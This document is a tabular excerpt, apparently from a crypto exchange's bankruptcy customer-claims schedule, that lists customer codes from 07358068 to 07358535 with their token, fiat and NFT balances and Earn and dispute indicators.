| 07358068 | | BTC[.00012776], DOGE[36.79705361], ETH[.00123347], ETHW[.00123347], USD[0.00] | | |
| 07358069 | | USD[10.00] | | |
| 07358070 | | BRZ[2], CUSDT[2], NFT (387154101585566557/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #58)[1], TRX[975.44000296], USD[0.00] | Yes | |
| 07358071 | | USD[10.00] | | |
| 07358072 | | USD[10.00] | | |
| 07358073 | | CUSDT[5], DOGE[150.80951077], TRX[3], USD[0.00] | | |
| 07358074 | | USD[0.00], USDT[0] | | |
| 07358075 | | BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00] | | |
| 07358076 | | CUSDT[1], DOGE[819.58341022], USD[0.00] | | |
| 07358077 | | USD[10.00] | | |
| 07358079 | | USD[10.00] | | |
| 07358080 | | DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07358082 | | BAT[12.12660299], BRZ[1], BTC[.0001], CUSDT[3], DOGE[0], ETH[0], GRT[6.68491744], LINK[2.21446241], MATIC[67.48338635], SOL[0], USD[0.13], USDT[1.10679652] | Yes | |
| 07358083 | | USD[10.00] | | |
| 07358084 | | CUSDT[1], DOGE[132.72756682], USD[0.00] | | |
| 07358086 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07358087 | | USD[10.00] | | |
| 07358089 | | USD[10.00] | | |
| 07358090 | | USD[10.00] | | |
| 07358091 | | DOGE[0], USD[0.01], USDT[0.00000001] | Yes | |
| 07358092 | | USD[10.00] | | |
| 07358093 | | USD[10.00] | | |
| 07358094 | | DOGE[44.56777774], USD[0.00] | | |
| 07358095 | | USD[10.00] | | |
| 07358098 | | USD[10.00] | | |
| 07358099 | | CUSDT[1], DOGE[18.74913033], USD[0.00] | | |
| 07358100 | | USD[10.00] | | |
| 07358101 | | USD[10.00] | | |
| 07358102 | | USD[10.00] | | |
| 07358103 | | USD[10.00] | | |
| 07358104 | | USD[10.00] | | |
| 07358105 | | USD[10.00] | | |
| 07358106 | | USD[10.00] | | |
| 07358107 | | USD[10.00] | | |
| 07358108 | | BF_POINT[100], BRZ[0], DOGE[.00301967], LINK[.00029277], NEAR[.00027529], SHIB[18.1296278], SOL[.00013213], USD[45.27], USDT[0] | Yes | |
| 07358109 | | CUSDT[1], DOGE[230.31055541], USD[0.00] | | |
| 07358110 | | CUSDT[1], GRT[6.10103129], TRX[6706.85579652], USD[0.00] | Yes | |
| 07358111 | | BRZ[1], BTC[.00359753], CUSDT[3], DOGE[447.00678668], TRX[1], USD[28.79], USDT[0] | | |
| 07358112 | | USD[30.00] | | |
| 07358113 | | USD[10.00] | | |
| 07358114 | | LINK[.37306106], LTC[.1867076], USD[0.05] | | |
| 07358115 | | SHIB[157758.66110524], USD[0.00] | Yes | |
| 07358116 | | BRZ[1], CUSDT[3], DOGE[15998.44884763], TRX[2], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358117 | | BCH[.10812086], BTC[.00007701], CUSDT[5], DOGE[.91022393], ETH[.10737208], ETHW[.10737208], LTC[.88316909], TRX[308.41024879], UNI[.41522471], USD[61.51] | | |
| 07358118 | | USD[10.00] | | |
| 07358119 | | USD[10.00] | | |
| 07358120 | | USD[10.00] | | |
| 07358121 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1357.04611658], TRX[4115.39056436], USD[0.00] | | |
| 07358122 | | USD[0.44] | | |
| 07358123 | | CUSDT[4], DOGE[1], SUSHI[2.21720974], USD[0.01], USDT[0.00004879] | Yes | |
| 07358124 | | USD[10.00] | | |
| 07358125 | | BRZ[3], CUSDT[23], DOGE[2], SHIB[1482144.52186013], SOL[3.86621444], TRX[7], USD[0.00], USDT[1.08367252] | Yes | |
| 07358126 | | DOGE[71.27434901], USD[0.00] | | |
| 07358127 | | DOGE[26.59165126], USD[0.00] | | |
| 07358128 | | USD[10.00] | | |
| 07358129 | | USD[10.00] | | |
| 07358130 | | CUSDT[3], DOGE[1884.62886755], ETH[.04599104], ETHW[.0454171], USD[0.00] | Yes | |
| 07358131 | | DOGE[243.04621885], USD[0.00] | | |
| 07358132 | | USD[10.00] | | |
| 07358134 | | USD[10.00] | | |
| 07358135 | | BRZ[1], CUSDT[3], DOGE[1], LINK[.00003584], NFT (539196223887329271/Miami Ticket Stub #539)[1], SOL[.026462], TRX[4], USD[0.00], USDT[0] | | |
| 07358136 | | BRZ[2], BTC[0], DOGE[1], ETH[0], ETHW[0], USD[0.00] | | |
| 07358137 | | AAVE[.01548], BTC[0.00008323], DOGE[.23595], ETH[.00010505], ETHW[.00010505], LINK[.0072394], LTC[.00896875], SOL[.064565], USD[0.00] | | |
| 07358138 | | USD[10.00] | | |
| 07358141 | | BTC[.00017429], USD[0.00] | | |
| 07358142 | | DOGE[1], USD[0.01], USDT[1] | | |
| 07358143 | | DOGE[6265.0814907], TRX[1], USD[10.00] | | |
| 07358144 | | DOGE[13.87747235], USD[0.00] | | |
| 07358145 | | USD[10.00] | | |
| 07358146 | | USD[10.00] | | |
| 07358147 | | USD[0.05] | | |
| 07358148 | | DOGE[0], LINK[0], USD[0.00] | | |
| 07358149 | | DOGE[7.87246605], USD[0.00] | | |
| 07358150 | | USD[10.00] | | |
| 07358152 | | USD[10.00] | | |
| 07358153 | | USD[10.00] | | |
| 07358154 | | USD[10.00] | | |
| 07358155 | | USD[10.00] | | |
| 07358156 | | DOGE[1], SGD[0.11], USD[0.00] | | |
| 07358157 | | DOGE[16.68567443], USD[9.00] | | |
| 07358158 | | CUSDT[3], DOGE[1753.76028161], USD[22.17] | | |
| 07358159 | | USD[10.00] | | |
| 07358160 | | CUSDT[3], DOGE[85.79803313], USD[0.00] | | |
| 07358161 | | BAT[14.36149147], CUSDT[6], DOGE[136.10571676], SOL[.08419295], TRX[1437.21045302], USD[0.01] | | |
| 07358162 | | DOGE[2449.58698014], TRX[1], USD[0.00] | Yes | |
| 07358163 | | CUSDT[1], USD[0.01] | | |
| 07358164 | | BAT[1.01655549], CUSDT[3], LINK[.00002255], USD[0.00] | Yes | |
| 07358165 | | USD[10.00] | | |
| 07358166 | | USD[10.00] | | |
| 07358167 | | DOGE[0], SHIB[45462660.86510435], USD[0.00] | Yes | |
| 07358168 | | USD[10.00] | | |
| 07358169 | | USD[0.00] | Yes | |
| 07358170 | | DOGE[38.74976667], USD[0.00] | | |
| 07358171 | | USD[10.00] | | |
| 07358172 | | USD[10.00] | | |
| 07358174 | | USD[10.00] | | |
| 07358175 | | USD[10.00] | | |
| 07358176 | | GRT[.0226903], USD[0.00] | Yes | |
| 07358177 | | BTC[.00038017], DOGE[2], USD[0.00] | | |
| 07358178 | | BTC[.00019531], USD[0.00] | | |
| 07358180 | | CUSDT[2352.70500964], DOGE[1022.12649576], ETH[.02542445], ETHW[.02542445], GRT[60.62760581], TRX[1], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358181 | | BF_POINT[300], DOGE[0], ETH[0], ETHW[0], KSHIB[0], NFT (411035364410675640/Robo 3)[1], NFT (492142283472951224/Robo 2)[1], SHIB[0], TRX[1], USD[0.00] | Yes | |
| 07358182 | | USD[10.00] | | |
| 07358183 | | GRT[0], USD[50.00] | | |
| 07358184 | | BTC[0], DOGE[0] | | |
| 07358185 | | BRZ[1], CUSDT[3], DOGE[1.00003035], ETH[0], ETHW[0], TRX[3], USD[0.01] | | |
| 07358186 | | USD[0.01] | | |
| 07358187 | | USD[0.00] | | |
| 07358188 | | USD[10.00] | | |
| 07358189 | | BTC[0.01436737], DOGE[0], USD[0.00] | Yes | |
| 07358190 | | BAT[2], BTC[.0042542], CUSDT[6], DOGE[1], TRX[2.63686752], USD[0.00] | | |
| 07358191 | | CUSDT[3], DOGE[1], SUSHI[1.32625726], TRX[3], USD[0.00] | | |
| 07358192 | | CUSDT[1], DOGE[390.89558463], USD[0.00] | | |
| 07358193 | | USD[10.00] | | |
| 07358194 | | USD[10.00] | | |
| 07358195 | | BAT[.00000761], BRZ[1], CUSDT[6], DOGE[6.00019108], GRT[.00004296], LINK[2.73289513], LTC[3.89558297], TRX[4592.00988405], USD[0.00] | | |
| 07358196 | | ETH[.00551413], ETHW[.00551413], USD[0.00] | | |
| 07358197 | | AAVE[2.29554267], BCH[.61067443], BRZ[1], CUSDT[17], DOGE[11.4513637], GRT[1467.34700293], LINK[14.28185817], LTC[1.46289513], SHIB[3182680.81506207], SUSHI[42.95705006], TRX[228.40360962], UNI[15.29080218], USD[0.00] | Yes | |
| 07358198 | | BAT[1], CUSDT[9905.4267588], USD[0.00] | | |
| 07358199 | | AUD[0.00], CUSDT[2], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], NFT (380522929564877485/CryptoDog #5)[1], NFT (412038362893479924/Anime #41)[1], NFT (468839600294073800/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #55)[1], NFT (491866058951346362/CryptoDog #10)[1], NFT (541189560440770444/CryptoDog #4)[1], NFT (546120609345678094/CryptoDog #2)[1], NFT (550135996365470203/Little Ben #2141)[1], TRX[278.30474080], USD[109.67], USDT[0] | Yes | |
| 07358200 | | TRX[1], USD[0.01] | | |
| 07358201 | | CUSDT[25], TRX[2], USD[0.01], USDT[1] | | |
| 07358202 | | USD[10.00] | | |
| 07358203 | | CUSDT[1], USD[5.85], USDT[0] | | |
| 07358204 | | BTC[.0002225], USD[0.00] | | |
| 07358205 | | USD[10.00] | | |
| 07358206 | | USD[10.00] | | |
| 07358207 | | BTC[0], CUSDT[1], DOGE[634.45846648], ETHW[10.03412188], LTC[.35931356], NFT (478488115433668997/Entrance Voucher #26910)[1], USD[0.00] | Yes | |
| 07358208 | | USD[10.00] | | |
| 07358209 | | USD[10.00] | | |
| 07358211 | | BAT[1], BRZ[0], DOGE[2], TRX[0], USD[0.01], USDT[0] | | |
| 07358212 | | DOGE[1], USD[0.00], USDT[0.00000001] | | |
| 07358213 | | USD[10.00] | | |
| 07358214 | | CUSDT[463.33698786], DOGE[1], TRX[.54017684], USD[0.00] | | |
| 07358215 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01], USDT[1.11019794] | Yes | |
| 07358218 | | BTC[.01505708], ETH[.00000074], ETHW[.00000074], SHIB[5], TRX[5365.16647219], USD[0.00] | Yes | |
| 07358221 | | USD[0.00] | | |
| 07358222 | | USD[10.00] | | |
| 07358223 | | BF_POINT[100], BRZ[0], ETH[.00000001], GRT[1], SHIB[2], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07358225 | | BRZ[1], CUSDT[4], DOGE[2], GRT[55.21365687], LINK[5.57349065], USD[0.00], USDT[0.00000016] | Yes | |
| 07358226 | | USD[10.00] | | |
| 07358227 | | BAT[1.00837272], DOGE[3.43414754], ETH[0], GRT[1], LINK[0], MATIC[0], SOL[3.20459521], TRX[1], USD[0.07], USDT[0] | Yes | |
| 07358228 | | BTC[.00034556], CUSDT[1], DOGE[539.69086045], USD[0.00] | | |
| 07358229 | | USD[0.01] | | |
| 07358230 | | USD[10.00] | | |
| 07358231 | | USD[10.00] | | |
| 07358232 | | USD[10.00] | | |
| 07358233 | | BAT[1], BRZ[2], CUSDT[1], DOGE[1790.37589362], LINK[1.93365791], SHIB[1384466.28824588], UNI[2.43628504], USD[0.00], USDT[0] | | |
| 07358234 | | USD[10.00] | | |
| 07358235 | | USD[10.00] | | |
| 07358236 | | USD[10.00] | | |
| 07358237 | | USD[10.00] | | |
| 07358238 | | DOGE[820.82707731], USD[0.00] | | |
| 07358240 | | USD[10.00] | | |
| 07358241 | | USD[10.00] | | |
| 07358242 | | USD[10.00] | | |
| 07358244 | | CUSDT[3], USD[0.00] | | |
| 07358245 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358246 | | BAT[1.0165555], BRZ[2], CUSDT[2], ETH[0], USD[0.00], YFI[.00000009] | Yes | |
| 07358247 | | USD[10.00] | | |
| 07358248 | | USD[10.00] | | |
| 07358249 | | BTC[.00098813], CUSDT[10], DOGE[1422.14193822], ETH[.05782157], ETHW[.05710391], TRX[1], USD[0.00] | Yes | |
| 07358250 | | TRX[210.25957385], USD[0.00] | | |
| 07358251 | | USD[0.20], USDT[.00000921] | | |
| 07358252 | | USD[0.01] | | |
| 07358253 | | BAT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07358254 | | CUSDT[2], SOL[.44858026], USD[0.00] | | |
| 07358255 | | CUSDT[1], USD[0.00] | | |
| 07358256 | | GRT[4.94319622], USD[0.00] | | |
| 07358257 | | USD[10.00] | | |
| 07358259 | | BAT[.00001657], BRZ[3], CUSDT[24], DOGE[3.00002801], SHIB[1527.75581211], SOL[.56455], TRX[.00007868], USD[0.00], USDT[0.00009809] | | |
| 07358260 | | BCH[0], BTC[0], CUSDT[8], DOGE[1], ETH[0], TRX[0], USD[0.00] | Yes | |
| 07358261 | | DOGE[141.29680226], USD[0.00] | | |
| 07358262 | | BAT[15.19041573], CUSDT[1], USD[0.00] | | |
| 07358263 | | BTC[.00017131], USD[0.00] | | |
| 07358264 | | DOGE[139.93236314], USD[0.00] | | |
| 07358265 | | DOGE[125.98326791], USD[0.00] | | |
| 07358266 | | USD[0.78] | Yes | |
| 07358268 | | DOGE[73.50842222], TRX[1], USD[12.00] | | |
| 07358269 | | USD[10.00] | | |
| 07358270 | | USD[10.00] | | |
| 07358271 | | USD[10.00] | | |
| 07358272 | | USD[10.00] | | |
| 07358273 | | USD[10.00] | | |
| 07358274 | | CUSDT[1], USD[13.07] | | |
| 07358275 | | DOGE[.00008762], TRX[.00002003], USD[0.01], USDT[0.00000283] | | |
| 07358277 | | ETH[.00288819], ETHW[.00288819], USD[0.00] | | |
| 07358278 | | DOGE[1131.1594311], USD[0.00] | | |
| 07358279 | | CUSDT[3], DOGE[5409.12128843], SHIB[8984027.26599052], TRX[1331.45899412], USD[0.00] | | |
| 07358280 | | DOGE[734.35653205], USD[0.00] | | |
| 07358281 | | CUSDT[1], DOGE[57.23726493], USD[0.00] | | |
| 07358282 | | CUSDT[3], DOGE[11178.63563946], GRT[1], SHIB[1], TRX[3], USD[0.97] | | |
| 07358283 | | EUR[8.31], USD[0.00] | | |
| 07358284 | | USD[10.00] | | |
| 07358285 | | BAT[1], DOGE[1.0000491], USD[0.01] | | |
| 07358287 | | USD[10.00] | | |
| 07358288 | | USD[10.00] | | |
| 07358289 | | USD[10.00] | | |
| 07358290 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07358291 | | USD[10.00] | | |
| 07358292 | | USD[10.00] | | |
| 07358293 | | USD[10.00] | | |
| 07358294 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07358295 | | USD[10.00] | | |
| 07358297 | | CUSDT[1], USD[0.00] | | |
| 07358298 | | DOGE[123.95227787], USD[0.00] | | |
| 07358299 | | USD[10.00] | | |
| 07358300 | | USD[10.00] | | |
| 07358301 | | BTC[.00017349], USD[0.00] | | |
| 07358302 | | USD[0.00] | | |
| 07358303 | | BRZ[2], CUSDT[5], DOGE[6.00009376], ETH[.00000001], ETHW[.00000001], SUSHI[.00000001], TRX[3], USD[0.05] | | |
| 07358304 | | USD[10.00] | | |
| 07358305 | | BTC[.00010379], DOGE[143.02356597], USD[0.00] | | |
| 07358306 | | BRZ[1], CUSDT[3], DOGE[.00190488], SHIB[13.09988184], TRX[1], USD[0.00] | Yes | |
| 07358307 | | BRZ[2], CUSDT[2], DOGE[629.44234039], TRX[1], USD[0.38] | | |
| 07358309 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358310 | | USD[10.00] | | |
| 07358311 | | BAT[4.35241702], BRZ[34.51055004], CUSDT[4], DOGE[0.72284703], GRT[1.00367791], LINK[.02591234], SOL[5.39003424], TRX[2], USD[-41.31], USDT[1.07771153] | Yes | |
| 07358313 | | BRZ[1], DOGE[48.87285847], TRX[1], USD[2.79] | | |
| 07358314 | | USD[10.00] | | |
| 07358315 | | USD[10.00] | | |
| 07358316 | | USD[10.00] | | |
| 07358317 | | USD[10.00] | | |
| 07358318 | | USD[10.00] | | |
| 07358319 | Contingent, Disputed | BTC[.00000005], USD[5.00] | | |
| 07358320 | | USD[10.00] | | |
| 07358321 | | USD[0.01] | | |
| 07358322 | | BRZ[1], BTC[.0015009], DOGE[817.30359876], USD[11.06] | Yes | |
| 07358323 | | ETH[.00573761], ETHW[.00573761], USD[0.00] | | |
| 07358324 | | USD[10.00] | | |
| 07358325 | | USD[10.00] | | |
| 07358326 | | USD[10.85] | Yes | |
| 07358327 | | BTC[0.00003253], USDT[.4] | | |
| 07358328 | | DOGE[0.00000001], USD[0.00] | | |
| 07358329 | | USD[10.00] | | |
| 07358331 | | USD[10.00] | | |
| 07358333 | | USD[10.00] | | |
| 07358334 | | USD[10.00] | | |
| 07358335 | | USD[10.00] | | |
| 07358336 | | BRZ[1], BTC[.00328254], CUSDT[2], DOGE[451.02923428], LTC[.32505093], SHIB[2.15315525], TRX[68.09372221], USD[0.00] | | |
| 07358337 | | CUSDT[1], DOGE[0], ETH[0], TRX[1], USD[0.01] | Yes | |
| 07358338 | | USD[10.00] | | |
| 07358339 | | USD[10.00] | | |
| 07358340 | | USD[10.00] | | |
| 07358341 | | CUSDT[3], DOGE[127.84694681], TRX[1], USD[0.00] | | |
| 07358342 | | CUSDT[3], DOGE[111.01255243], USD[0.00] | | |
| 07358343 | | USD[0.00] | | |
| 07358344 | | DOGE[.14329051], USD[0.00] | | |
| 07358345 | | USD[10.00] | | |
| 07358346 | | USD[11.04] | Yes | |
| 07358348 | | USD[0.01] | | |
| 07358350 | | USD[10.00] | | |
| 07358351 | | USD[10.00] | | |
| 07358352 | | BRZ[1], DOGE[1], USD[0.34] | | |
| 07358353 | | BRZ[0.00000004], ETH[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07358354 | | BAT[1], CUSDT[3], TRX[.5], USD[0.49] | | |
| 07358355 | | BTC[0], CUSDT[1], DOGE[2], TRX[234.43137181], USD[0.00], USDT[0] | Yes | |
| 07358356 | | CUSDT[1145.98978841], NFT [466366828290961906/Vojoh! #2][1], TRX[660.66043209], USD[0.00] | Yes | |
| 07358357 | | DOGE[1], LINK[7.97440183], TRX[2218.9627919], USD[0.00] | Yes | |
| 07358358 | | BRZ[1], CUSDT[5], TRX[1], USD[0.00] | | |
| 07358359 | | USD[10.00] | | |
| 07358360 | | USD[10.00] | | |
| 07358362 | | BRZ[1], CUSDT[1], DOGE[1338.83480601], USD[0.00] | | |
| 07358363 | | DOGE[1], USD[0.00] | | |
| 07358365 | | USD[10.00] | | |
| 07358366 | | BRZ[.00232146], BTC[.00046791], DAI[.00191687], DOGE[1.11647414], ETHW[2.6521152], LINK[.09253087], LTC[.00091793], MATIC[.07447081], SHIB[2442666.77597493], SUSHI[.67345724], USD[0.54], USDT[0.00090634] | Yes | |
| 07358367 | | USD[10.00] | | |
| 07358368 | | CUSDT[2], DOGE[52.93987163], ETHW[.30270447], GRT[2], TRX[2], USD[0.00] | | |
| 07358369 | | USD[10.00] | | |
| 07358371 | | USD[10.00] | | |
| 07358372 | | CUSDT[118.01118628], DOGE[1213.41415203], ETHW[.00780149], GRT[3.00369972], LINK[16.79193571], SHIB[3], USD[1560.82] | Yes | |
| 07358374 | | USD[10.00] | | |
| 07358375 | | CUSDT[6], DOGE[2921.01623221], TRX[1], USD[0.00] | Yes | |
| 07358376 | | TRX[1], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358377 | | GRT[7.56092039], USD[0.00] | Yes | |
| 07358378 | | BRZ[1], CUSDT[2], TRX[2], USD[242.62] | Yes | |
| 07358379 | | DOGE[1], SOL[.10789599], USD[0.00] | Yes | |
| 07358380 | | USD[10.00] | | |
| 07358381 | | DOGE[2657.69860135], USD[0.00] | | |
| 07358382 | | BAT[2], BRZ[4], CUSDT[16], ETH[0], TRX[6], USD[0.00] | | |
| 07358383 | | BTC[.00021522], USD[0.00] | | |
| 07358385 | | USD[10.00] | | |
| 07358386 | | USD[10.00] | | |
| 07358388 | | USD[10.00] | | |
| 07358389 | | USD[10.00] | | |
| 07358390 | | USD[10.00] | | |
| 07358391 | | CUSDT[2], USD[0.00] | | |
| 07358392 | | USD[10.00] | | |
| 07358393 | | TRX[6.03337850], USD[0.01], USDT[0] | | |
| 07358394 | | DOGE[151.85401605], USD[0.00] | | |
| 07358395 | | USD[0.03] | | |
| 07358396 | | BTC[.00012452], DOGE[58.87183895], USD[0.00] | | |
| 07358397 | | USD[10.00] | | |
| 07358398 | | USD[10.00] | | |
| 07358399 | | USD[10.00] | | |
| 07358400 | | USD[10.00] | | |
| 07358402 | | TRX[204.22909381], USD[0.00] | Yes | |
| 07358403 | | AVAX[2.00108609], BAT[1], BRZ[6.17792813], BTC[.00001615], CUSDT[20], DOGE[1], ETH[.00004345], ETHW[7.03818894], MATIC[126.6178205], SHIB[18641661.68348808], SUSHI[76.25628472], TRX[230.07747187], USD[0.00] | Yes | |
| 07358404 | | USD[0.00] | | |
| 07358405 | | DOGE[2.00000558], GRT[5.32107341], NFT [341673363816351693/Entrance Voucher #2486][1], SOL[1.10754467], SUSHI[1.10728181], TRX[1], USD[0.01], USDT[1.10754467] | Yes | |
| 07358406 | | DOGE[.66264192], USD[0.00] | | |
| 07358407 | | USD[10.00] | | |
| 07358409 | | USD[0.01] | | |
| 07358410 | | BAT[0], DOGE[0], LTC[0], USD[0.00] | | |
| 07358411 | | LTC[.02568782], USD[0.00] | | |
| 07358412 | | DOGE[176.79517377], USD[0.00] | | |
| 07358413 | | USD[10.00] | | |
| 07358414 | | USD[10.00] | | |
| 07358415 | | BRZ[3], CUSDT[5], DOGE[1], TRX[1], USD[1.80] | | |
| 07358416 | | CUSDT[3], DOGE[7.29835121], USD[0.00] | | |
| 07358417 | | USD[10.00] | | |
| 07358418 | | USD[10.00] | | |
| 07358419 | | BRZ[0], BTC[0], DOGE[1.00001517], SHIB[1], SOL[0], TRX[.000003], USD[0.00], USDT[0.00006146] | | |
| 07358420 | | USD[10.00] | | |
| 07358421 | | DOGE[0], SHIB[1], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07358422 | | USD[10.00] | | |
| 07358423 | | BRZ[3], DOGE[4], SHIB[11], TRX[1], USD[0.00] | | |
| 07358424 | | USD[10.00] | | |
| 07358425 | | USD[10.00] | | |
| 07358426 | | DOGE[135.97853279], USD[0.00] | | |
| 07358427 | | BAT[0], BRZ[1], BTC[0], DOGE[2], SOL[0], TRX[0], USD[0.00] | | |
| 07358428 | | BRZ[3], CUSDT[15], DOGE[475.58660750], SHIB[0], TRX[1], USD[0.00], USDT[1] | | |
| 07358429 | | DOGE[26.96668448], USD[0.00] | | |
| 07358430 | | DOGE[1.00003333], USD[0.00] | | |
| 07358431 | | USD[0.00] | | |
| 07358432 | | USD[11.05] | Yes | |
| 07358433 | | CUSDT[2], DOGE[5878.67704335], TRX[232.22736136], USD[0.00] | | |
| 07358434 | | CUSDT[4], USD[0.00] | | |
| 07358435 | | DOGE[32.39091381], USD[0.00] | | |
| 07358436 | | USD[0.07] | | |
| 07358437 | | USD[10.00] | | |
| 07358438 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358439 | | USD[10.00] | | |
| 07358440 | | BRZ[2], ETH[0], TRX[1], USD[0.00] | | |
| 07358441 | | BAT[2.02228447], BF_POINT[300], BRZ[3], CUSDT[5], DOGE[4546.91588426], GRT[3.0361758], LTC[.0004412], SHIB[1], TRX[3], USD[0.00], USDT[1.05988760] | Yes | |
| 07358442 | | BTC[.00002041], DAI[.99500399], DOGE[70.7653685], LINK[.07996131], USD[0.50] | | |
| 07358443 | | USD[10.00] | | |
| 07358444 | | USD[10.00] | | |
| 07358445 | | BAT[.01260554], BTC[.04614175], CUSDT[6], DOGE[1.55418465], TRX[171.06713919], USD[0.03] | Yes | |
| 07358446 | | USD[10.00] | | |
| 07358447 | | BF_POINT[200], BTC[.00361566], SHIB[8], UNI[46.68708689], USD[0.00] | Yes | |
| 07358448 | | DOGE[151.11618189], USD[0.00] | | |
| 07358449 | | USD[10.00] | | |
| 07358451 | | USD[10.00] | | |
| 07358453 | | BRZ[1], USD[0.00] | | |
| 07358454 | | USD[10.00] | | |
| 07358455 | | DOGE[31.64381318], USD[0.00] | | |
| 07358456 | | USD[10.00] | | |
| 07358457 | | USD[10.00] | | |
| 07358458 | | USD[0.00] | Yes | |
| 07358459 | | DOGE[138.25336505], USD[0.00] | | |
| 07358460 | | CUSDT[1], DOGE[2], USD[0.01] | | |
| 07358461 | | USD[0.00] | | |
| 07358462 | | USD[10.00] | | |
| 07358463 | | ETH[.07766020], ETHW[.07669749], LINK[1.33525158], TRX[2], USD[0.00] | Yes | |
| 07358464 | | USD[0.01] | | |
| 07358466 | | BRZ[2], DOGE[1.0000389], ETH[.06298214], ETHW[.06298214], TRX[1], USD[0.00] | | |
| 07358467 | | BRZ[0], DOGE[0], TRX[2], USD[0.00], USDT[0] | | |
| 07358468 | | USD[10.00] | | |
| 07358469 | | CUSDT[2], DOGE[2], LTC[0], USD[0.00] | | |
| 07358470 | | ETH[.00304494], ETHW[.00304494], USD[0.07] | | |
| 07358471 | | USD[10.00] | | |
| 07358472 | | DOGE[1613.04735227], USD[0.00], USDT[0.00000001] | | |
| 07358473 | | BRZ[1], BTC[.00037946], CUSDT[7], DOGE[3], TRX[5], USD[0.01] | | |
| 07358474 | | BAT[1.01655549], CUSDT[2], USD[0.51] | Yes | |
| 07358475 | | BTC[.00026488], USD[10.00] | | |
| 07358476 | | BTC[0], DOGE[0], ETH[0], LINK[0], USD[0.00] | Yes | |
| 07358478 | | BAT[46.84625392], BTC[0], DOGE[301.87120820], ETH[.00498], ETHW[.00498], TRX[48.276], USD[7.69], USDT[0] | | |
| 07358479 | | USD[10.00] | | |
| 07358480 | | BTC[.00060491], USD[0.00] | | |
| 07358481 | | USD[10.00] | | |
| 07358482 | | USD[10.00] | | |
| 07358483 | | DOGE[1], SUSHI[0], USD[0.00] | Yes | |
| 07358484 | | USD[10.00] | | |
| 07358485 | | CUSDT[1], DOGE[735.0595282], USD[0.00] | | |
| 07358486 | | SOL[.03482599], USD[0.00] | Yes | |
| 07358487 | | USD[10.38] | Yes | |
| 07358488 | | BRZ[1], CUSDT[8], DOGE[635.55584135], SHIB[889571.72968793], SOL[.00002989], USD[0.00] | | |
| 07358489 | | USD[10.00] | | |
| 07358491 | | USD[10.00] | | |
| 07358492 | | USD[10.00] | | |
| 07358494 | | DOGE[136.50458976], USD[0.00] | | |
| 07358496 | | CUSDT[7], DOGE[1], TRX[1], USD[0.01] | | |
| 07358498 | | USD[10.00] | | |
| 07358499 | | USD[10.00] | | |
| 07358500 | | CUSDT[1], DOGE[.00000703], TRX[1], USD[0.01] | | |
| 07358501 | | USD[10.00] | | |
| 07358504 | | ALGO[356.51611303], CUSDT[1], DOGE[.02178542], SHIB[1], SOL[20.35512684], TRX[5.17715804], USD[0.00], USDT[1.00943233] | Yes | |
| 07358505 | | USD[10.00] | | |
| 07358506 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358507 | | USD[10.00] | | |
| 07358508 | | USD[10.00] | | |
| 07358509 | | USD[10.00] | | |
| 07358510 | | TRX[1], USD[5.00] | | |
| 07358511 | | USD[10.00] | | |
| 07358512 | | USD[10.00] | | |
| 07358513 | | BAT[2.11229931], BRZ[1], BTC[.0000066], CUSDT[15], DOGE[1.82289939], LINK[.22670225], TRX[2], USD[0.01], USDT[1.09981398] | Yes | |
| 07358515 | | DOGE[1], USD[0.00] | | |
| 07358516 | | USD[10.00] | | |
| 07358517 | | ETH[0], USD[0.00] | | |
| 07358518 | | DOGE[1], USD[0.01] | | |
| 07358520 | | BRZ[0], CUSDT[8294.80176177], DOGE[0], TRX[0], USD[0.00] | Yes | |
| 07358521 | | USD[10.00] | | |
| 07358522 | | BRZ[1], CUSDT[1], DOGE[428.11483674], USD[0.00] | | |
| 07358523 | | USD[10.00] | | |
| 07358525 | | USD[10.00] | | |
| 07358526 | | USD[10.00] | | |
| 07358528 | | DOGE[19.53009726], USD[0.00] | | |
| 07358529 | | CUSDT[2], DOGE[3], GRT[11.64668262], USD[0.00] | Yes | |
| 07358530 | | USD[10.00] | | |
| 07358531 | | LTC[0], USD[0.00], USDT[0] | Yes | |
| 07358532 | | DOGE[146.04076903], USD[0.00] | | |
| 07358533 | | USD[10.00] | | |
| 07358535 | | USD[10.00] | | |
